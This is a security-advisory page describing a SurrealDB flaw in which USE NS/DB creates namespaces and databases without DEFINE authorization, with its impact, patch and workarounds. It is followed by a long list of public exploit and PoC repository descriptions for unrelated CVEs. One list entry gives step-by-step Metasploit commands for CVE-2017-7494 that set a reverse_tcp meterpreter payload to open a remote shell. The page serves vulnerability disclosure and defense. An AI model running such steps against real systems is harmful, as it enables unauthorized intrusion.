GHSA-wp87-mgvq-5j93MEDIUMCVSS 6.5

SurrealDB: USE NS/DB implicit creation bypasses DEFINE authorization

Published Jul 1, 2026·Updated Jul 1, 2026

Description

An anonymous caller could create new namespaces and databases on a running SurrealDB instance without holding `DEFINE NAMESPACE` or `DEFINE DATABASE` permission. `USE NS <name>` and `USE DB <name>` automatically create the target when it does not exist. The three places `USE` is handled — the RPC `use` method, `Datastore::process_use`, and the SurrealQL executor — did not check whether the caller was allowed to create the resource. Under default capabilities any session reached this path, including an unauthenticated guest. ### Impact What an attacker **can** do: - Create new namespaces and databases without `DEFINE NAMESPACE` / `DEFINE DATABASE` permission. An unauthenticated guest is enough under default capabilities. - Recreate a parent namespace that an operator deliberately dropped, using a stale namespace-Editor token, by running `USE NS <dropped> DB anything`. - Exhaust catalog storage by repeatedly creating new resources. What it **can't** do: - Read or modify data inside any pre-existing namespace or database. - Escalate to root or namespace-owner privileges on existing resources. - Affect deployments running with `auth_enabled=false`. ### Patches All three `USE` entry points now check whether the caller has `DEFINE NAMESPACE` / `DEFINE DATABASE` authority before creating a missing target. Sessions still update their context regardless of authorization, so SDKs that send `use` before `signin` continue to work — only the catalog creation step is gated. The parent-namespace side-effect path is closed by the same check. Versions 3.1.0 and later are not affected. ### Workarounds - Set `--deny-arbitrary-query *` for guest principals to remove the entry point. - Run with `--auth` and require all callers to `signin` before issuing `use`. - Revoke namespace-level tokens promptly when a namespace is dropped.

Affected Packages (1)

surrealdbCARGO
Fixed in 3.1.0

Public Exploits & PoCs100 found

PoC: CVE-2026-6307

Google Chrome CVE-2026-6307 PoC

3

PoC: root-sonim-xp3800

app that ports CVE-2019-2215 to arm32 and mounts a su binary to /sbin with denylist + root app installer. firehose/Magisk guide included

2

PoC: Linux-Kernel-Vulnerabilities-CVE-2026-23111

High Severity LPE vulnerability in Linux Kernel, with a CVS score of 7.8. An inverted check from user enables a process inside the container to break out of the sandbox along with full root privileges on user PC. I have been investigating about this vulnerability and has a lightweight script that runs in the terminal to check if you are vulnerable.

1

PoC: xperia_5_bl_unlocker_poc

My take on unlocking Xperia 5 SO-01M for p42 bootloader using CVE-2021-1931

1

PoC: cve-2026-23111-poc

scuffed PoC for CVE-2026-23111. Made and ran on Linux Kernel 6.12.69

1

PoC: CVE_ADC_IOC_2026

Citrix NetScaler CVE Preconditions Checker as per CTX696604 | Supported CVE : CVE-2026-8451, CVE-2026-8452, CVE-2026-8655, CVE-2026-10816, CVE-2026-10817, and CVE-2026-13474

1

PoC: CVE-2026-46300

CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit

1

PoC: CVE-2025-69212-PoC

OpenSTAManager v2.9.8 and earlier versions contain a critical OS Command Injection vulnerability in the P7M (signed XML) file decoding function.

1

PoC: CVE-2026-24418

OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module.

1

PoC: CVE-2026-69212

Python poc, exploit for CVE-2025-69212

1

PoC: OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

1

PoC: pagecache-lpe-containment-kit

Educational, defensive kit for two Linux page-cache-corruption LPEs (DirtyClone CVE-2026-43503, pedit COW CVE-2026-46331): hardening, detection, verification, seccomp + validation harness. Detection and prevention only — no exploit code. TLP:CLEAR.

1

PoC: By-Poloss..-..CVE-2026-12432-PoC

WP Full Stripe Free <= 8.4.3 - Missing Authorization

1

PoC: CVE-2026-48558

SimpleHelp OIDC Authentication Bypass PoC

PoC: Vulnerability-scanner

DESIGN AND IMPLEMENTATION OF A VULNERABILITY SCANNER FOR CVE-2026-45498 IN MICROSOFT DEFENDER

PoC: CVE-2026-33017

Python POC, Exploit for CVE-2026-33017

PoC: CVE-2021-27877-PoC

A modified version of the Rapid7 Metasploit module for CVE-2021-27877 that supports direct command execution for reliable vulnerability validation. Includes documentation explaining the exploit workflow, the module modifications, and usage examples.

PoC: CVE-2026-30784-rustdesk-poc

CVE-2026-30784: RustDesk hbbs Traffic Amplification PoC & PCAP Analysis

PoC: CVE-2026-52813

Gogs has Path Traversal in organization name that results in RCE through Git hooks

PoC: CVE-2026-53753

Crawl4AI <= 0.8.6 pre-auth RCE via AST sandbox escape (gi_frame.f_back.f_builtins chain) — CVSS 10.0

PoC: CVE-2025-69212

CVE-2025-69212 Proof-of-concept.

PoC: OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

PoC: CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS Command Injection PoC

PoC: F5-BIG-IP

O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.

PoC: CVE-2026-6307-Longinus

CVE-2026-6307 PoC: Longinus - 2 Boundaries in One Bug https://nebusec.ai/research/v8-cve-2026-6307-writeup/)

PoC: CVE-2026-48907

CVE-2026-48907 PoC

PoC: CVE-2026-43735

Safari 跨域信息读取

PoC: cve-2025-24054-lab

Blue-team lab: detecting & mitigating CVE-2025-24054 (Windows NTLM hash disclosure) with Sysmon, Wazuh SIEM, and Group Policy

PoC: CVE-2026-42945

A flaw was found in NGINX, specifically within the ngx_http_rewrite_module. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests under specific rewrite configurations. This can lead to a heap buffer overflow in the NGINX worker process, which may result in arbitrary code execution

PoC: CVE-2026-51947-Advisory

Pivotal CRM's patch for an initial deserialization vulnerability was incomplete. The fix switched from BinaryFormatter to JSON.NET but left TypeNameHandling set to 4 without implementing SerializationBinder, allowing attackers to execute arbitrary code through malicious $type payloads. Fixed in 6.6.5.10 and Patch_CWE502_20260316.zip

PoC: CVE-2026-46331

pedit COW

PoC: Incident-Response-Report-TeamCity-Compromise-CVE-2024-27198-

CyberDefenders JetBrains Lab

PoC: CVE-2026-55488

motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read

PoC: CVE-2026-58138-Conductor-Unauth-RCE

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator (HostAccess.ALL). Lab + PoC, verified e2e (root).

PoC: CVE-2026-46490-samlify-SAML-Attribute-Injection

CVE-2026-46490 — samlify <2.13.0 SAML AttributeValue XML injection -> signed-assertion privilege escalation. Self-contained PoC, verified e2e.

PoC: CVE-2025-40271

CVE-2025-40271 Modifed By MadEploits

PoC: cve-2026-46331-pedit-cow-auditd-detection

Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.

PoC: cve-2015-1187-dir820l-reproduction

Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.

PoC: CVE-2012-1823

CVE-2012-1823 - PHP CGI Argument Injection Remote Code Execution (RCE)

PoC: CVE-2026-22557-Path-Traversal-Ubiquti-UniFi

CVE-2026-22557 Path Traversal Ubiquti UniFi Network Application

PoC: CVE-2026-48907

POC for CVE-2026-48907

PoC: CVE-2026-49869

Kestra Auth-Bypass Vulnerability Checker

PoC: CVE-2026-31694-POC

Linux kernel FUSE readdir cache out-of-bounds write (CVE-2026-31694): a malicious FUSE server overflows a page-cache page by 24 bytes. PoC plus an unprivileged local-root exploit via /etc/passwd page-cache corruption. Run only inside a VM.

PoC: IS

Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju

PoC: CVE-2026-46331

Chequeo y Fix de la vulnerabilidad "pedit COW"

PoC: CVE-2025-45422---Bbox

CVE-2025-45422: Proximus b-box UPnP Persistence & Access Control Bypass

PoC: CVE-2026-10580

PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover

PoC: CVE-2026-56121-Feast-Unauth-RCE

CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.

PoC: CVE-2026-46817

CVE-2026-46817 - Draft

PoC: CVE-2026-8037

CVE-2026-8037 - Draft

PoC: CVE-2026-27626-PoC

OliveTin is a self-hosted web UI for exposing predefined shell commands to end users. This repository contains a proof-of-concept demonstrating two independent OS command injection vectors in OliveTin's Shell mode execution path, both of which bypass the application's intended shell-argument safety checks.

PoC: cve-2024-31317

Detailed discussion of Zygote vulnerability CVE-2024-31317

PoC: CVE-2026-43700

https://support.apple.com/en-us/127685#:~:text=2026%2D43704%3A%20dr3dd-,WebKit,-Available%20for%3A%20macOS

PoC: CVE-2026-44789-n8n-PrototypePollution-RCE

CVE-2026-44789 — n8n <1.123.43 HTTP Request pagination prototype pollution to RCE (NODE_OPTIONS runner-spawn gadget). Lab + automated PoC, verified e2e.

PoC: CVE-2023-43364-Searchor-RCE-Exploit

POC exploit via unsafe `eval()` usage in Searchor (≤ 2.4.2)

PoC: CVE-2026-46817

CVE-2026-46817

PoC: cve-2026-46331-audit

cve-2026-46331-audit script

PoC: CVE-2026-56782-Gorse-Auth-Bypass

CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e.

PoC: cve-2026-0000-reference

NIST CVE-2026-0000 Keylogger Analysis

PoC: CVE-2026-48907

CVE-2026-48907 – Joomla JCE Unauthenticated Remote Code Execution (RCE)

PoC: CVE-2026-53753-Crawl4AI-RCE

CVE-2026-53753 — Crawl4AI <0.8.7 unauthenticated RCE (AST sandbox escape via gi_frame.f_back). Lab + PoC, verified e2e.

PoC: cve-2023-4911-exploit-optimized

Pure C exploit for CVE-2023-4911 (Looney Tunables). No Python required. Features multi-processing brute-forcing, dynamic calibration, and integrated ELF parser.

PoC: CVE_2024_1086_vulnerability_check

CVE-2024-1086 vulnerability

PoC: CVE-2026-43503

DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503

PoC: cve-2026-9082-drupal

drupal-postgresql-rce

PoC: graylog-cve-2024-24824-exploit

Proof-of-concept exploit for CVE-2024-24824 demonstrating how an arbitrary class loading primitive can be transformed into remote code execution on vulnerable Graylog deployments.

PoC: CVE-2026-55200

CVE-2026-55200 - Critical libssh2 Remote Code Execution Vulnerability

PoC: By-Poloss..-..CVE-2026-48939

iCagenda Unauthenticated File Upload to RCE

PoC: cve-2025-0133

CVE-2025-0133 Scanner | Palo Alto GlobalProtect XSS Checker

PoC: CVE-2026-22226

Proof of Concept for the CVE-2026-22226

PoC: CVE-2026-20253

POC for CVE-2026-20253

PoC: Joomla_CVE_2026_48907

cve-2026-48907 scanner

PoC: DirtyClone

Python Proof of Concept for DirtyClone (CVE-2026-43503) - Linux kernel LPE via page-cache corruption

PoC: WiseDelete

Windows utility that demonstrates user-mode interaction with the vulnerable WiseDelfile64.sys driver and uses CVE-2025-66680 to perform kernel-assisted file deletion.

PoC: CVE-2025-55182-React2Shell-RCE

React2Shell (CVE-2025-55182) PoC

PoC: CVE-2026-48908

Unauthenticated RCE PoC for CVE-2026-48908 SP Page Builder (Joomla) arbitrary file upload and remote code execution exploit with mass scaning support.

PoC: WiseDelete

A lightweight Windows utility demonstrating user-mode interaction with the vulnerable WiseDelfile64.sys driver using CVE-2025-66680 to perform kernel-assisted file deletion.

PoC: CVE-2026-23918-Double-free-Apache-httpd-mod_http2

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE

PoC: CVE-2018-18778

CVE-2018-18778 - ACME mini_httpd Arbitrary File Read

PoC: CVE-2023-0386-OverlayFS

Copy fake in-memory files to disk using overlayFS

PoC: CVE-2026-49048-JoomCCK-SQLi

CVE-2026-49048 — JoomCCK 6.4.0 Unauthenticated SQL Injection (CVSS 9.8)

PoC: crypto-lab-merkle-proofs

Browser-based Merkle tree demo — build a tree, generate inclusion proofs, recompute the root hash by hash, and replay the RFC 6962 second-preimage and CVE-2012-2459 attacks. Real SHA-256. No backend.

PoC: react2shell-exploit

React2Shell: CVE-2025-55182

PoC: CVE-2026-12485

CVE-2026-12485

PoC: DevHub-HTB-Walkthrough

Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escalation)

PoC: CVE-2026-41179

POC for CVE-2026-41179

PoC: dirtyclone-exploit

CVE-2026-46331 — Linux Kernel Local Privilege Escalation TC pedit + IPsec TEE Page Cache Corruption · Affected kernels: ≤ 6.12.9

PoC: CVE-2026-27654

Обзор n-day уязвимости на русском языке.

PoC: CVE-2026-41940-PoC

CVE-2026-41940 authentication bypass vulnerability proof-of-concept

PoC: laravel-filemanager-unrestricted-upload

PoC for CVE-2025-56399 - Unrestricted File Upload leading to RCE in alexusmai/laravel-file-manager (≤3.3.1). Automates detection, CSRF extraction, and File Upload

PoC: DirtyClone

DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503

PoC: CVE-2025-69212-Authenticated-RCE-PoC

Automated PoC for CVE-2025-69212 - OpenSTAManager <=2.9.8 authenticated RCE

PoC: ffmpeg-jellyfix

patched ffmpeg-tools for jellyfin to patch CVE-2026-8461 aka PixelSmash

PoC: prefect-cve-2026-5366

PoC for CVE-2026-5366: git argument injection in Prefect's GitRepository leading to RCE on the worker.

PoC: CVE-2026-0073-Android-ADBD-bypass-POC_zh_CN

CVE-2026-0073-Android-ADBD-bypass-POC汉化版

PoC: Lucky13-Exploit-Script

Proof-of-concept exploit for the Lucky13 TLS/SSL vulnerability (CVE-2013-0169)

PoC: CVE-2026-48907

CVE-2026-48907 is a CVSS 10.0 pre-auth RCE in Joomla Content Editor affecting all versions ≤ 2.9.99.4. The Grayxploit team breaks down the 3-weakness chain — missing auth, no extension validation, and an unsafe upload flag — that lets attackers pop a shell in 3 HTTP requests.

PoC: htb-orion-writeup

Hack The Box - Orion (Easy) | CVE-2025-32432 & CVE-2026-24061

PoC: CVE-2026-36834

Out-of-bounds array read in LibRaw

PoC: masta-cve-2026-48907

cve-2026-48907 scanner

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free